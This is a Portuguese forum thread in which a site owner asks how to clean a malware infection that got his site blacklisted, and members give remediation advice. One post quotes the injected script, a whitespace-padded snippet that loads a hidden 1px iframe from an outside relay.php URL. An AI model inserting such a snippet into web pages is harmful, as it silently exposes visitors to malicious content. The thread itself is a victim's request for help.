← Desenvolvimento

O meu site está blacklisted

Lida 3493 vezes

Offline

njota 
Membro
Mensagens 241 Gostos 0
Feedback +2

Troféus totais: 17
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Level 3 Level 2 Level 1 100 Posts 50 Posts 10 Posts First Post

Hoje ia entrar no meu site a apareceu-me um aviso a dizer que o site foi blacklisted...

O problema é que eu nem faço ideia qual possa ser o problema para resolver. O site em questão é o www.ligadosadeptos.com se me puderem dar alguma orientação sobre o que fazer agradecia imenso.
Offline

rickylife 
Membro
Mensagens 84 Gostos 0
Feedback +26

Troféus totais: 18
Trófeus: (Ver todos)
Windows User Super Combination Combination Topic Starter Level 3 Level 2 Level 1 50 Posts 10 Posts First Post

Isso quer dizer que o site foi infectado com malware .

Se o teu cms for wordpress por vezes apenas uma actualização da versão resolve
Offline

asturmas 
Administrador
Mensagens 19734 Gostos 50
Feedback +2

Troféus totais: 39
Trófeus: (Ver todos)
Mobile User Windows User Super Combination Combination Topic Starter 100 Poll Votes 50 Poll Votes 10 Poll Votes Poll Voter Poll Starter

Pelo menos neste momento o site já não tem malware: http://sitecheck.sucuri.net/results/ligadosadeptos.com

Solicita a revisão do site no Webmaster Tools.
Offline

Bruno Gaspar 
Membro
Mensagens 242 Gostos 1
Feedback +3

Troféus totais: 18
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Poll Voter Level 3 Level 2 Level 1 100 Posts 50 Posts 10 Posts

Pelo menos neste momento o site já não tem malware: http://sitecheck.sucuri.net/results/ligadosadeptos.com

Solicita a revisão do site no Webmaster Tools.
Exacto, como o asturmas referiu, vais ao teu site, quando te aparecer a pagina do Chrome a dizer que esta com malware clica no link "Advanced" (ao lado do butao "Go Back") e depois em "Details about problems on this website" ai sera so ires ate ao fim da pagina e clicares em "Webmaster Tools", fazeres login e seguires os passos necessários.
Offline

njota 
Membro
Mensagens 241 Gostos 0
Feedback +2

Troféus totais: 17
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Level 3 Level 2 Level 1 100 Posts 50 Posts 10 Posts First Post

Obrigado pela ajuda, já solicitei uma análise ao google, espero que não demorem muito.
Offline

njota 
Membro
Mensagens 241 Gostos 0
Feedback +2

Troféus totais: 17
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Level 3 Level 2 Level 1 100 Posts 50 Posts 10 Posts First Post

O problema é deste script que me continua a aparecer no site:

Citar
<script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    (function () {    var loayu = document.createElement('iframe');    loayu.src = 'http://espace-en-soi.org/images-yoga-ayurveda/relay.php';    loayu.style.position = 'absolute';    loayu.style.border = '0';    loayu.style.height = '1px';    loayu.style.width = '1px';    loayu.style.left = '1px';    loayu.style.top = '1px';    if (!document.getElementById('loayu')) {        document.write('<div id=\'loayu\'></div>');        document.getElementById('loayu').appendChild(loayu);    }})();</script>


Qual a melhor forma de me ver livre disto? :-k
Offline

njota 
Membro
Mensagens 241 Gostos 0
Feedback +2

Troféus totais: 17
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Level 3 Level 2 Level 1 100 Posts 50 Posts 10 Posts First Post

Nunca mais acaba esta aventura... já usei 3 anti-malwares diferentes e de vez em quando lá aparece de novo o raio do script no site. Tenho que ir quase todos os dias limpar os ficheiros manualmente. Nunca mais ficou blacklisted, mas a continuar assim é uma questão de tempo.

Que anti-malware sugerem para ver se apanho de vez a causa disto?
Offline

marsupillami 
Equipa
Mensagens 850 Gostos 4
Feedback +1

Troféus totais: 28
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Poll Voter Level 5 Level 4 Level 3 Level 2 Level 1 500 Posts

Se o código surge novamente após ser limpo, será provavelmente pela existência de uma falha no site ou de algum acesso conhecido.

Sugeria-te que actualizasses o site e respectivos plugins (caso utilizes um CMS) e alterasses todos os acessos à tua conta de alojamento. Verifica também se o teu computador está limpo e sem qualquer malware.
Offline

njota 
Membro
Mensagens 241 Gostos 0
Feedback +2

Troféus totais: 17
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Level 3 Level 2 Level 1 100 Posts 50 Posts 10 Posts First Post

Obrigado pelas dicas, fiz isso e há 3 dias que não existem problemas, espero que esteja resolvido de vez. :obrigado:
Offline

asturmas 
Administrador
Mensagens 19734 Gostos 50
Feedback +2

Troféus totais: 39
Trófeus: (Ver todos)
Mobile User Windows User Super Combination Combination Topic Starter 100 Poll Votes 50 Poll Votes 10 Poll Votes Poll Voter Poll Starter

Mas usas algum cms ou e codigo programado de raiz? Se sim devias contratar alguém para fazer uma auditoria de segurança a isso..
Offline

njota 
Membro
Mensagens 241 Gostos 0
Feedback +2

Troféus totais: 17
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Level 3 Level 2 Level 1 100 Posts 50 Posts 10 Posts First Post

Mas usas algum cms ou e codigo programado de raiz? Se sim devias contratar alguém para fazer uma auditoria de segurança a isso..

Infelizmente não fiz o site nem tenho capacidade para analisar ou responder a isso, mas isto é um site que não me gera rendimento, é mais um passatempo, e por isso a ideia de estar a pagar a alguém para ver isso não me agrada muito...